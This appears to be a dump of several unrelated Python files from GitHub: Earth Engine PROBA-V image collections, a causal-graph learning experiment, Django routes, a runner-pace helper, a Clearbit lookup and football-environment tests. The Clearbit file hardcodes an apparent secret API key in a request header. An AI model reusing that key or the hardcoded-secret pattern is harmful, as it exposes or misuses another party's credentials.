if so add 'gee_date' without mosaicing\n #\n eeimagecollection = geeutils.mosaictodate(eeimagecollection, szmethod=None, verbose=verbose) # currently None defaults to \"mosaic\" \n #\n # add collection properties describing this collection\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'PV333sm')\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .unmask(2, False) # mask to 00000010 - all bad, sea, undefined\n .toUint8()))\n return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_pv333simplemask(GEECol_pv333sm):\n \"\"\"\n https://developers.google.com/earth-engine/datasets/catalog/VITO_PROBAV_C1_S1_TOC_333M#bands\n \n STATUS MASK band:\n Bits 0-2: Cloud/ice snow/shadow flag : 0: Clear 1: Shadow 2: Undefined 3: Cloud4: Ice\n Bit 3: Land/sea : 0: Sea 1: Land (pixels with this value may include areas of sea)\n Bit 4: Radiometric quality SWIR flag : 0: Bad 1: Good\n Bit 5: Radiometric quality NIR flag : 0: Bad 1: Good\n Bit 6: Radiometric quality RED flag : 0: Bad 1: Good\n Bit 7: Radiometric quality BLUE flag : 0: Bad 1: Good\n\n geemask.SimpleMask: not masked (or clear) will be\n 0111 0000 : 112 Radiometric all but blue ok. sea. clear sky.\n 0111 1000 : 120 Radiometric all but blue ok. land. clear sky.\n 1111 0000 : 240 Radiometric all ok. sea. clear sky. \n 1111 1000 : 248 Radiometric all ok. land. clear sky. \n \n \"\"\"\n\n def __init__(self, colfilter=None):\n super().__init__(colfilter)\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n #\n # base collection from parent (SM)\n #\n eeimagecollection = super().collect(eeroi, eedatefrom, eedatetill, verbose=verbose)\n #\n #\n #\n def simplemask(image):\n return (geemask.SimpleMask([112, 120, 240, 248])\n .makemask(image)\n .Not()\n .unmask(255, False) # sameFootprint=False: otherwise missing beyond footprint becomes 0. 
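(a hedged reading, assumed: these 333m composites are global, so there is no area beyond the footprint and the unmask should be a no-op.) 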
TODO: what does this mean here (global images)\n .toUint8() # uint8 [0:not masked, 1:masked], no data: 255\n .rename('MASK')\n .copyProperties(image, ['system:time_start', 'gee_date']))\n eeimagecollection = eeimagecollection.map(simplemask)\n #\n # no mosaic/composite - already done in base collection - and was obsolete there, but for the 'gee_date' property\n #\n pass\n #\n # add collection properties describing this collection (in this case: overwrites 'gee_description' from GEECol_pv333sm)\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'PV333smsimplemask')\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n 0: not masked\n 1: masked\n 255: no data\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .unmask(255, False) # no data to 255\n .toUint8())) # actually obsolete here\n return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_pv333rgb(GEECol, OrdinalProjectable):\n \"\"\"\n experimental - just for the fun of it (to check where multiband images give problems)\n - actually not rgb but a 'false color'\n \n https://developers.google.com/earth-engine/datasets/catalog/VITO_PROBAV_C1_S1_TOC_333M\n - doesn't bother to give minimum and maximum values of the bands\n \n https://proba-v.vgt.vito.be/sites/proba-v.vgt.vito.be/files/products_user_manual.pdf\n - reflectances: scale: 2000 offset: 0 no-data: -1\n - PV = (DN - OFFSET) / SCALE\n \n \"\"\"\n\n def __init__(self, colfilter=None):\n self.colfilter=colfilter\n if (colfilter is not None) and (not isinstance(colfilter, geemask.IColFilter) ) : raise ValueError(\"filter expected to be an IColFilter\")\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n\n #\n #\n # \n eeimagecollection = (ee.ImageCollection('VITO/PROBAV/C1/S1_TOC_333M')\n .select(['RED', 'NIR', 'BLUE', 'SM']) # SM to allow STATUS MASK-based filters\n .filterBounds(eeroi)\n .filter(ee.Filter.date(eedatefrom, eedatetill)))\n #\n # (optional) filtering - typically -but not mandatory- using an SCL based filter\n #\n if self.colfilter is not None:\n eeimagecollection = self.colfilter.filtercollection(eeimagecollection, eeroi, verbose=verbose)\n #\n # drop SM band which was only included to allow STATUS MASK based filter\n #\n eeimagecollection = eeimagecollection.select(['RED', 'NIR', 'BLUE'])\n #\n # no sense in mosaicing: S1_TOC_333M is global\n # however: geeutils.mosaictodate adds the 'gee_date' property which is mandatory in a GEECol\n # TODO: check if nop-mosaic costs performance. if so add 'gee_date' without mosaicing\n #\n eeimagecollection = geeutils.mosaictodate(eeimagecollection, szmethod=None, verbose=verbose)\n #\n # add collection properties describing this collection\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'PV333rgb')\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n PV products_user_manual:\n - reflectances: scale: 2000 offset: 0 no-data: -1\n - PV = (DN - OFFSET) / SCALE\n\n we'll try to mimic Sentinel-2 TCI bands scaling\n 'The TCI is an RGB image built from the B02 (Blue), B03 (Green), and B04 (Red) Bands. \n The reflectances are coded between 1 and 255, 0 being reserved for 'No Data'. 
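\n\n        a hedged worked example of the mapping below (values assumed):\n        DN 400 (reflectance 0.2)  -> 400/2000*254 + 1 = 51.8 before the uint8 cast\n        DN 2000 (reflectance 1.0) -> 255; masked pixels -> unmask(0) -> 0 ('No Data')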
\n\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .divide(2000).multiply(254).add(1)\n .unmask(0, False)\n .toUint8()\n .copyProperties(image)\n .copyProperties(image, ['system:time_start'])))\n return eeimagecollection\n\n\n\n","repo_name":"haesend/geepatches","sub_path":"src/geepatches/geeproduct.py","file_name":"geeproduct.py","file_ext":"py","file_size_in_byte":92108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5893605277","text":"# -*- coding: utf-8 -*-\nimport nauka\nimport io, logging, os, sys, time, pdb\nimport torch\nimport uuid\n\nfrom PIL import Image\nfrom zipfile import ZipFile\n\nfrom .models import *\n\n\nclass ExperimentBase(nauka.exp.Experiment):\n \"\"\"\n The base class for all experiments.\n\n NOTE: This class inherits from nauka.exp.Experiment. \n An experiment comprises both an in-memory state and an on-disk state. At\n\tregular intervals, the in-memory state is synchronized with the on-disk\n\tstate, thus permitting a resume should the experiment be killed. These\n\ton-disk serializations are called \"snapshots\".\n\n some of the methods are:\n load(self, path): Load state of the experiment from given path.\n dump(self, path): Dump state to the directory path\n fromScratch(self): Start an experiment from a snapshot\n snapshot(self) : Take a snapshot of the experiment (uses dump(self, path) )\n purge(self, ...): Purge snapshot directory of all the snapshots preserving\n only some of those (e.g. the last one)\n\n\n \"\"\"\n def __init__(self, a):\n self.a = type(a)(**a.__dict__)\n self.a.__dict__.pop(\"__argp__\", None)\n self.a.__dict__.pop(\"__argv__\", None)\n self.a.__dict__.pop(\"__cls__\", None)\n if self.a.workDir:\n super().__init__(self.a.workDir)\n else:\n projName = \"CausalOptimization-40037046-a359-470b-b327-af9bbef3e532\"\n expNames = [] if self.a.name is None else self.a.name\n workDir = nauka.fhs.createWorkDir(self.a.baseDir, projName, self.uuid, expNames)\n super().__init__(workDir)\n self.mkdirp(self.logDir)\n \n def reseed(self, password=None):\n \"\"\"\n Reseed PRNGs for reproducibility at beginning of interval.\n \"\"\"\n password = password or \"Seed: {} Interval: {:d}\".format(self.a.seed,\n self.S.intervalNum,)\n nauka.utils.random.setstate (password)\n nauka.utils.numpy.random.set_state (password)\n nauka.utils.torch.random.manual_seed (password)\n nauka.utils.torch.cuda.manual_seed_all(password)\n return self\n \n def brk(self, it, max=None):\n \"\"\" Iterate through an iterator. 
Ends in case of debug or max reached\n \"\"\"\n for i, x in enumerate(it):\n if self.a.fastdebug and i>=self.a.fastdebug: break\n if max is not None and i>=max: break\n yield x\n \n @property\n def uuid(self):\n u = nauka.utils.pbkdf2int(128, self.name)\n u = uuid.UUID(int=u)\n return str(u)\n @property\n def dataDir(self):\n return self.a.dataDir\n @property\n def logDir(self):\n return os.path.join(self.workDir, \"logs\")\n @property\n def isDone(self):\n return (self.S.epochNum >= self.a.num_epochs or\n (self.a.fastdebug and self.S.epochNum >= self.a.fastdebug))\n @property\n def exitcode(self):\n return 0 if self.isDone else 1\n\n\n\nclass Experiment(ExperimentBase):\n \"\"\"\n Causal experiment.\n \"\"\"\n \n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n class MsgFormatter(logging.Formatter):\n def formatTime(self, record, datefmt):\n t = record.created\n timeFrac = abs(t-int(t))\n timeStruct = time.localtime(record.created)\n timeString = \"\"\n timeString += time.strftime(\"%F %T\", timeStruct)\n timeString += \"{:.3f} \".format(timeFrac)[1:]\n timeString += time.strftime(\"%Z\", timeStruct)\n return timeString\n formatter = MsgFormatter(\"[%(asctime)s ~~ %(levelname)-8s] %(message)s\")\n handlers = [\n logging.FileHandler (os.path.join(self.logDir, \"log.txt\")),\n logging.StreamHandler(sys.stdout),\n ]\n for h in handlers:\n h.setFormatter(formatter)\n logging.basicConfig(\n level = logging.INFO,\n handlers = handlers,\n )\n logging.info(\"*****************************************\")\n logging.info(\"Command: \"+\" \".join(sys.argv))\n logging.info(\"CWD: \"+os.getcwd())\n logging.info(\"Experiment Name: \"+self.name)\n logging.info(\"Experiment UUID: \"+self.uuid)\n logging.info(\"Experiment Work Dir: \"+self.workDir)\n logging.info(\"\")\n logging.info(\"\")\n \n @property\n def name(self):\n \"\"\"A unique name containing every attribute that distinguishes this\n experiment from another and no attribute that does not.\"\"\"\n attrs = [\n self.a.seed,\n self.a.model,\n self.a.num_epochs,\n self.a.batch_size, # | DEFAULT\n self.a.dpe, # (int) Nr of training distribution per epoch | 1000\n self.a.train_functional, # (int) Nr of batches for functional parameters per distribution | 0\n self.a.ipd, # (int) Nr of interventions per distribution | 100\n self.a.hidden_truth, # (int) Nr of hidden neurons in ground-truth network. | None\n self.a.hidden_learn, # (int) Nr of hidden neurons in learner network. | None\n self.a.num_vars, # (int) Nr of variables in the system (M in paper) | 5\n self.a.num_cats, # (int) Nr of categories per variable (N in paper) | 3\n self.a.num_parents, # (int) Nr of expected parents. Default is 5. | 5\n self.a.cpi, # (int) Nr Configurations per intervention | 20\n self.a.xfer_epi_size, # (int) Nr Transfer episode size | 10\n self.a.predict, # (int) Nr of iterations to predict which node was intervened upon| 0\n self.a.predict_cpb, # (int) Configurations per batch during intervention prediction | 10\n self.a.temperature, # (float) Temperature of the MLP. 
| 1.0\n self.a.structural_only, # (bool) whether to learn structural parameters only | False\n self.a.structural_init, # (bool) Initialize structural parameters to ground truth | False\n self.a.graph, # (str) structure of the causal graph (ground thruth) | None\n self.a.cuda, # | \n self.a.model_optimizer, # (str) Model Optimizer | nag:0.001,0.9 \n self.a.gamma_optimizer, # (str) Gamma optimizer | nag:0.0001,0.9\n self.a.lmaxent, # (float) Regularizer for maximum entropy | 0.00 \n self.a.lsparse, # (float) Regularizer for sparsity | 0.00\n self.a.ldag, # (float) Regularizer for DAGness | 0.1\n self.a.fastdebug, # (bool) Debug | False\n ]\n return \"-\".join([str(s) for s in attrs]).replace(\"/\", \"_\")\n \n def load(self, path):\n self.S = torch.load(os.path.join(path, \"snapshot.pkl\"))\n return self\n \n def dump(self, path):\n torch.save(self.S, os.path.join(path, \"snapshot.pkl\"))\n return self\n \n def fromScratch(self):\n pass\n \"\"\"Reseed PRNGs for initialization step\"\"\"\n self.reseed(password=\"Seed: {} Init\".format(self.a.seed))\n \n \"\"\"Create snapshottable-state object\"\"\"\n self.S = nauka.utils.PlainObject()\n \n \"\"\"Model Instantiation\"\"\"\n self.S.model = None\n if self.a.model == \"cat\":\n self.S.model = CategoricalWorld(self.a)\n elif self.a.model == \"asia\":\n self.S.model = AsiaWorld(self.a)\n if self.S.model is None:\n raise ValueError(\"Unsupported model \\\"\"+self.a.model+\"\\\"!\")\n \n if self.a.cuda:\n self.S.model = self.S.model.cuda(self.a.cuda[0])\n else:\n self.S.model = self.S.model.cpu()\n \n \"\"\"Optimizer Selection\"\"\"\n self.S.msoptimizer = nauka.utils.torch.optim.fromSpec(self.S.model.parameters_slow(), self.a.model_optimizer)\n self.S.goptimizer = nauka.utils.torch.optim.fromSpec(self.S.model.structural_parameters(), self.a.gamma_optimizer)\n \n \"\"\"Counters\"\"\"\n self.S.epochNum = 0\n self.S.intervalNum = 0\n self.S.stepNum = 0\n \n return self\n \n def run(self):\n \"\"\"Run by intervals until experiment completion.\"\"\"\n while not self.isDone:\n self.interval().snapshot().purge()\n return self\n \n def interval(self):\n \"\"\"\n An interval is defined as the computation- and time-span between two\n snapshots.\n \n Hard requirements:\n - By definition, one may not invoke snapshot() within an interval.\n - Corollary: The work done by an interval is either fully recorded or\n not recorded at all.\n - There must be a step of the event logger between any TensorBoard\n summary log and the end of the interval.\n \n For reproducibility purposes, all PRNGs are reseeded at the beginning\n of every interval.\n \"\"\"\n \n self.reseed()\n \n \n \"\"\"Training Loop\"\"\"\n self.S.model.train()\n for q in self.brk(range(self.a.dpe)): # For each training distribution in epoch\n if q>0: self.S.stepNum += 1\n \n # ==================================================================\n # 0) Initialize a new ground truth model with the same causal graph\n # ==================================================================\n self.S.model.alterdists() # reinitialize randomly the weights of the ground truth model\n # (but keep the struct of the causal graph ( gammagt ) unchanged)\n self.S.model.zero_fastparams() # Set to zero the fast parameters of the learner\n \n \n # ==================================================================\n # 1) Train slow parameters only Loop (to adapt to new ground truth model)\n # ==================================================================\n if self.a.train_functional:\n smpiter = 
self.S.model.sampleiter(self.a.batch_size)    # An iterator of batch_size samples from the ground truth model\n                cfgiter = self.S.model.configpretrainiter()             # An iterator of causal structures drawn from the learner parameters gamma\n\n                # Train the functional parameters\n                for b, (batch, config) in self.brk(enumerate(zip(smpiter, cfgiter)), max=self.a.train_functional):\n                    self.S.msoptimizer.zero_grad()   # self.S.msoptimizer optimizes only the slow parameters of the learner net\n                    # NLL: negative log likelihood\n                    nll = -self.S.model.logprob(batch, config)[0].mean() # Compute the loss from the learner on the batch with that config (using fast + slow params)\n                    nll.backward()                   # Compute the gradients\n                    self.S.msoptimizer.step()        # Train the slow parameters of the learner network\n                    if self.a.verbose and b % self.a.verbose == 0:\n                        logging.info(\"Train functional param only NLL: \"+str(nll.item()))\n            \n            # ==================================================================\n            # 2) Interventions Loop\n            #    2.1) An intervention is done\n            #    2.2) Estimate the node upon which the intervention was made\n            #    2.3) Compute the loss / gradients w.r.t the intervention node [TODO: I have not fully understood this]\n            #    2.4) Adapt the fast parameters of the learner to the intervention\n            #    2.5) Optimize gamma\n            # ==================================================================\n            for j in self.brk(range(self.a.ipd)):\n                if j>0: self.S.stepNum += 1\n                intervention_tstart = time.time()\n                \n                \"\"\"Perform intervention under guard.\"\"\"\n                # Perform an intervention which modifies the ground truth model at the beginning of the loop\n                # and undoes it at the end of the loop\n\n                # ==============================================================\n                # 2.1) An intervention is done\n                # ==============================================================\n                with self.S.model.intervene() as intervention: \n\n                    # ==========================================================\n                    # 2.2) Estimate the node upon which the intervention was made\n                    # ==========================================================\n                    \"\"\"Possibly attempt to predict the intervention node,\n                    instead of relying on knowledge of it.\"\"\"\n                    if self.a.predict:\n                        with torch.no_grad():\n                            accnll = 0\n                            smpiter = self.S.model.sampleiter(self.a.batch_size)    # An iterator of batch_size samples from the ground truth model\n                            cfgiter = self.S.model.configpretrainiter()             # An iterator of causal structures drawn from the learner parameters gamma\n\n                            # Use self.a.predict batches and select the node with the largest NLL\n                            # as the one for which the intervention was made. 
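A hedged toy illustration (numbers assumed):\n                            # accnll per node = [2.1, 5.7, 2.3] -> torch.argmax -> node 1 is flagged as intervened.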
\n\n                            # TODO [Simone M.]: It might be better to select the node where the difference\n                            # NLL_after_intervention - NLL_before_intervention is the biggest ?\n\n                            for batch in self.brk(smpiter, max=self.a.predict):          # Average result on self.a.predict batches\n                                for config in self.brk(cfgiter, max=self.a.predict_cpb): # Average the result on self.a.predict_cpb causal structures drawn\n                                    accnll += -self.S.model.logprob(batch, config)[0].mean(0)\n                            selnode = torch.argmax(accnll).item()\n                            logging.info(\"Predicted Intervention Node: {}  Actual Intervention Node: {}\".format([selnode], list(iter(intervention))))\n                            intervention = selnode\n                    \n                    self.S.goptimizer.zero_grad()\n                    self.S.model.gamma.grad = torch.zeros_like(self.S.model.gamma)\n                    \n                    # ==========================================================\n                    # 2.3) Compute the loss / gradients [TODO: I have not fully understood this]\n                    # ==========================================================  \n\n                    gammagrads = [] # List of T tensors of shape (M,M,) indexed by (i,j)\n                    logregrets = [] # List of T tensors of shape (M,)   indexed by (i,)\n                    \n                    \"\"\"Transfer Episode Adaptation Loop\"\"\"\n                    smpiter = self.S.model.sampleiter(self.a.batch_size)   # An iterator of batch_size samples from the ground truth model\n                    for batch in self.brk(smpiter, max=self.a.xfer_epi_size):\n                        gammagrad = 0\n                        logregret = 0\n                        \n                        \"\"\"Configurations Loop\"\"\"\n                        cfgiter = self.S.model.configiter()   # An iterator of causal structures drawn from the learner parameters gamma\n                        for config in self.brk(cfgiter, max=self.a.cpi):# For each intervention, consider self.a.cpi configurations\n                            \"\"\"Accumulate Gamma Gradient\"\"\"\n                            if self.a.predict:   # If the intervention node has been estimated\n                                # Compute the loss only for the intervention node [TODO: I am not sure about this!]\n                                logpn, logpi = self.S.model.logprob(batch, config, block=intervention)\n                            else:\n                                # Compute the loss for all nodes\n                                logpn, logpi = self.S.model.logprob(batch, config)\n                            with torch.no_grad():\n\n                                # TODO: Why are gradients computed in this way?\n                                gammagrad += self.S.model.gamma.sigmoid() - config\n                                logregret += logpn.mean(0)\n                            logpi.sum(1).mean(0).backward()   # Compute the gradients\n                        \n                        gammagrads.append(gammagrad)\n                        logregrets.append(logregret)\n                    \n\n                    # ==========================================================\n                    # 2.4) Adapt the fast parameters of the learner to the intervention\n                    # ==========================================================\n                    \"\"\"Update Fast Optimizer\"\"\"\n                    # Train the fast parameters of the learner with the model_optimizer\n                    # to adapt to the intervention\n                    for batch in self.brk(smpiter, max=self.a.xfer_epi_size):\n                        self.S.model.zero_fastparams()\n                        self.S.mfoptimizer = nauka.utils.torch.optim.fromSpec(\n                            self.S.model.parameters_fast(), self.a.model_optimizer)\n                        self.S.mfoptimizer.zero_grad()\n                        cfgiter = self.S.model.configiter()\n                        for config in self.brk(cfgiter, max=self.a.cpi):\n                            logprob = self.S.model.logprob(batch, config)[0].sum(1).mean()\n                            logprob.backward()\n                        self.S.mfoptimizer.step()\n                    all_logprobs = []\n                    for batch in self.brk(smpiter, max=self.a.xfer_epi_size):\n                        cfgiter = self.S.model.configiter()\n                        for config in self.brk(cfgiter, max=self.a.cpi):\n                            all_logprobs.append(self.S.model.logprob(batch, config)[0].mean())\n                    \n                    # ==========================================================\n                    # 2.5) Optimize gamma\n                    # ==========================================================\n                    \"\"\"Gamma Gradient Estimator\"\"\"\n                    with torch.no_grad():\n                        gammagrads = torch.stack(gammagrads)\n                        logregrets = torch.stack(logregrets)\n                        
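# hedged shape note (assumed): logregrets stacks to (T, M); softmax over dim 0 turns the\n                        # per-transfer-batch log-likelihoods into normalised weights per node.\n                        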
normregret = logregrets.softmax(0)\n\n # R is the meta-objective (loss) for the slow params [see paper]\n # dRdgamma are its gradients w.r.t. gamma\n dRdgamma = torch.einsum(\"kij,ki->ij\", gammagrads, normregret)\n self.S.model.gamma.grad.copy_(dRdgamma)\n all_logprobs = torch.stack(all_logprobs).mean()\n \n \"\"\"Gamma Regularizers\"\"\"\n siggamma = self.S.model.gamma.sigmoid()\n Lmaxent = ((siggamma)*(1-siggamma)).sum().mul(-self.a.lmaxent)\n Lsparse = siggamma.sum().mul(self.a.lsparse)\n Ldag = siggamma.mul(siggamma.t()).cosh().tril(-1).sum() \\\n .sub(self.S.model.M**2 - self.S.model.M) \\\n .mul(self.a.ldag)\n (Lmaxent + Lsparse + Ldag).backward()\n \n \"\"\"Perform Gamma Update with constraints\"\"\"\n self.S.goptimizer.step()\n self.S.model.reconstrain_gamma()\n \n \"\"\"Stop timer\"\"\"\n intervention_tend = time.time()\n \n \"\"\"Print the state of training occasionally\"\"\"\n if self.a.verbose:\n with torch.no_grad():\n # Compute Binary Cross-Entropy over gammas, ignoring diagonal\n siggamma = self.S.model.gamma.sigmoid()\n pospred = siggamma.clone()\n negpred = 1-siggamma.clone()\n posgt = self.S.model.gammagt\n neggt = 1-self.S.model.gammagt\n pospred.diagonal().fill_(1)\n negpred.diagonal().fill_(1)\n bce = -pospred.log2_().mul_(posgt) -negpred.log2_().mul_(neggt)\n bce = bce.sum()\n bce.div_(siggamma.numel() - siggamma.diagonal().numel())\n \n logging.info(\"\")\n logging.info(\"**************************\")\n logging.info(\"Gamma GT: \"+os.linesep+str(self.S.model.gammagt.detach()))\n logging.info(\"Gamma: \"+os.linesep+str(siggamma))\n logging.info(\"dRdGamma: \"+os.linesep+str(dRdgamma))\n logging.info(\"Gamma Grad: \"+os.linesep+str(self.S.model.gamma.grad.detach()))\n logging.info(\"Gamma CE: \"+str(bce.item()))\n logging.info(\"Intervention Time (s): \"+str(intervention_tend-intervention_tstart))\n logging.info(\"Exp. temp. Transfer logprob: \"+str(all_logprobs.item()))\n logging.info(\"\")\n \n if self.S.stepNum % self.a.verbose == 0:\n # Append a PNG to a Zip file to avoid too many files\n # on the filesystem\n GAMMABIO = io.BytesIO()\n GAMMAVIZ = self.S.model.vizualize_gamma().numpy()\n GAMMAIMG = Image.fromarray(GAMMAVIZ, \"RGB\")\n GAMMAIMG.save(GAMMABIO, \"png\")\n GAMMAPNG = \"gamma-{:07d}.png\".format(self.S.stepNum)\n GAMMAZIP = os.path.join(self.logDir, \"gamma.zip\")\n with ZipFile(GAMMAZIP, 'a') as GAMMAZIP:\n GAMMAZIP.writestr(GAMMAPNG, GAMMABIO.getvalue())\n \n \n \"\"\"Exit\"\"\"\n logging.info(\"Epoch {:d} done.\\n\".format(self.S.epochNum))\n self.S.epochNum += 1\n self.S.intervalNum += 1\n self.S.stepNum += 1\n return self\n","repo_name":"Simosound94/causality_experiments","sub_path":"causal_learning_unknown_interventions/causal/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":23775,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"22872575857","text":"from django.conf.urls import url\nfrom . 
import views\n#from jhtdb.views import Getcutout\n\nurlpatterns = [\n    # ex: /jhtdb/\n    url(r'^$', views.index, name='index'),\n    #url(r'^geturl/$', views.geturl, name='geturl'),\n    url(r'^getcutout/(?P.*)$', views.getcutout, name='getcutout'),\n    #url(r'^getcutout/(?P.*)$', Getcutout.as_view()),\n    url(r'^preview/(?P.*)$', views.preview, name='preview'),\n    url(r'^getprogress/(?P.*)$', views.getprogress, name='getprogress'),\n    url(r'^poll_for_download/$', views.poll_for_download, name='poll_for_download'),\n    url(r'^tests/(?P.*)$', views.tests, name='tests'),\n]\n","repo_name":"idies/Turbulence","sub_path":"Cutout_Webservice/jhtdb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"27190932544","text":"from enum import Enum\nfrom plan.utils import (\n    split,\n    join,\n    vma_to_speed,\n)\n\n\nclass Gender(Enum):\n    MAN = 0\n    WOMAN = 1\n\n\nclass Runner:\n    def __init__(self, age, vma, gender=Gender.MAN, max_hr=None):\n        self.age = age\n        self.vma = vma\n        self.gender = gender\n        if max_hr is None:\n            # Gellish & Coll. 2007\n            max_hr = 191.5 - 0.007 * (age * age)\n        self.max_hr = max_hr\n\n    @property\n    def hash(self):\n        return join([self.age, self.vma, \"0\" if self.gender == Gender.MAN else \"1\", self.max_hr], \"%\")\n\n    @classmethod\n    def from_hash(cls, hash):\n        elmts = split(hash, \"%\")\n        age, vma, gender, max_hr = elmts\n        return cls(\n            int(age), float(vma), Gender.MAN if gender == \"0\" else Gender.WOMAN, float(max_hr)\n        )\n\n    def get_max_fc(self, intensity):\n        intensity = intensity / 100\n        if intensity <= 0.7:\n            return self.max_hr * (intensity + 0.08)\n        if intensity > 0.95:\n            return intensity\n        return self.max_hr * (intensity + 0.1)\n\n    def get_speed(self, intensity):\n        return vma_to_speed(self.vma, intensity)\n\n    def get_avg_speed(self, min_intensity, max_intensity):\n        speed_low = self.get_speed(min_intensity)\n        speed_high = self.get_speed(max_intensity)\n        return (speed_low + speed_high) / 2.0\n","repo_name":"tarekziade/vma","sub_path":"plan/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20579899616","text":"from api.models import *\nimport pandas as pd\nfrom django.conf import settings\ndata = pd.read_csv(settings.BASE_DIR / 'api/indiadata.csv')\ncityob = city.objects.filter(country__name = \"India\")\ndef load():\n    print('working',len(cityob))\n    count = 0\n    for da in cityob:\n        fdf = data[ (data[\"COUNTY\"].str.lower() == da.name.lower()) & (data[\"STATE\"].str.lower() == da.state.name.lower()) ]\n        if len(fdf) > 0:\n            bulkdata = [\n                cityLocations(\n                    city_id = da.id,\n                    location = record['CITY'],\n                    pincode = record['POSTAL_CODE'],\n                    latitude = record['LATITUDE'],\n                    longitude = record['LONGITUDE'],\n                    communitiny = record['COMMUNITY'],\n                )\n                for record in fdf.to_dict('records')\n            ]\n            cityLocations.objects.bulk_create(bulkdata)\n        count += 1\n        print(F\"{count} of {len(cityob)} {da.name} is done\")","repo_name":"RitikSisodiy/ulisting","sub_path":"api/loaddata.py","file_name":"loaddata.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34894045976","text":"import aiohttp\nimport asyncio\n\n\nURL = 'https://company.clearbit.com/v2/companies/find?domain={}'\n\nasync def get_company_data(domain):\n    headers = {'Authorization': 'Bearer sk_30240e2d1dfc1d73d26ab80390d1fd49' 
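# NOTE: a live-looking Clearbit secret key is hardcoded here; in practice this\n    # would come from configuration or an environment variable rather than source.\n    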
}\n url = URL.format(domain)\n async with aiohttp.ClientSession() as session:\n async with session.get(url, headers=headers) as response:\n response = await response.json()\n if 'error' in response:\n message = response['error']['message']\n return {'success': False, 'data': {'message': message}}\n return {'success': True, 'data': response}\n \n\n\n\n\n# loop = asyncio.get_event_loop()\n# loop.run_until_complete(get_company_data('google.com'))","repo_name":"EladKulman/company_in","sub_path":"back/api/services/clearbit.py","file_name":"clearbit.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37636788969","text":"import sys\nimport numpy as np\nfrom absl import logging\n\nlogging.set_verbosity(logging.INFO)\n\nfrom gfootball.env import create_environment\nfrom ..tools.tracer import MatchTracer\n\nenv = create_environment(\n env_name=\"11_vs_11_kaggle\",\n number_of_left_players_agent_controls=1,\n number_of_right_players_agent_controls=0,\n representation=\"raw\",\n render=True, # set to True will save large-size RGB frame.\n write_full_episode_dumps=True,\n logdir=\"./temp\",\n other_config_options={\"sorted_observations\": True},\n)\n\ntracer = MatchTracer()\n\n# now, only need to provide those two parameters.\ntracer.update_settings({\"n_left_control\": 1, \"n_right_control\": 0})\n\nprint(\"test_tracer\")\nobs = env.reset()\nsteps = 0\nprint(steps)\nwhile True:\n try:\n actions = env.action_space.sample()\n if isinstance(actions, int):\n actions = [actions]\n tracer.update(obs, actions)\n obs, rew, done, info = env.step(actions)\n steps += 1\n if steps % 100 == 0:\n print(steps, rew)\n if done:\n tracer.update(obs)\n tracer.save(\"temp/random_play.trace\")\n break\n except:\n tracer.save(\"temp/random_play.trace\")\n break\n","repo_name":"Shanghai-Digital-Brain-Laboratory/DB-Football","sub_path":"light_malib/envs/gr_football/debugger/test_tracer.py","file_name":"test_tracer.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"37"} +{"seq_id":"886286039","text":"import os\nimport tempfile\nimport unittest\nfrom logging import getLogger, DEBUG, Formatter, StreamHandler\n\nfrom atcodertools.common.judgetype import JudgeType, ErrorType\nfrom atcodertools.constprediction.constants_prediction import predict_constants, predict_modulo, \\\n predict_yes_no, YesNoPredictionFailedError, predict_judge_method, \\\n MultipleDecimalCandidatesError, predict_limit\nfrom tests.utils.gzip_controller import make_html_data_controller\n\nANSWER_FILE = os.path.join(\n os.path.dirname(os.path.abspath(__file__)),\n './resources/test_constpred/answer.txt')\n\nlogger = getLogger(__name__)\nlogger.setLevel(DEBUG)\nhandler = StreamHandler()\nformatter = Formatter(\"%(asctime)s %(levelname)s: %(message)s\")\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\n\ndef _to_str(x):\n if x is None:\n return \"\"\n return str(x)\n\n\nclass TestConstantsPrediction(unittest.TestCase):\n\n def setUp(self):\n self.temp_dir = tempfile.mkdtemp()\n self.html_data_controller = make_html_data_controller(\n tempfile.mkdtemp())\n self.test_dir = self.html_data_controller.create_dir()\n\n def tearDown(self):\n self.html_data_controller.remove_dir()\n\n def test_predict_constants(self):\n with open(ANSWER_FILE, 'r') as f:\n answers = f.read().split(\"\\n\")\n\n agc_html_paths = [path for path in sorted(\n os.listdir(self.test_dir)) if 
